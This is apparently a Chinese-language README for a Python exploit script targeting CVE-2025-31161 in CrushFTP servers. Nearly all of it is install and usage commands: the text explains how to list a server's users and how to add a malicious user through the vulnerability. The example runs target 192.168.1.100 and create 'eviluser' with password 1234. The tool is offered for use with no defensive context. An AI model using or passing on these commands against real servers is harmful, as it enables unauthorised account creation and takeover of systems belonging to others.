该仓库包含一个用于与存在 CVE-2025-31161 漏洞的 CrushFTP 服务进行交互的 Python 脚本。 该脚本允许您列出现有用户,并通过利用该漏洞添加一个恶意用户。
requests 模块pip install -r requirements.txt
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234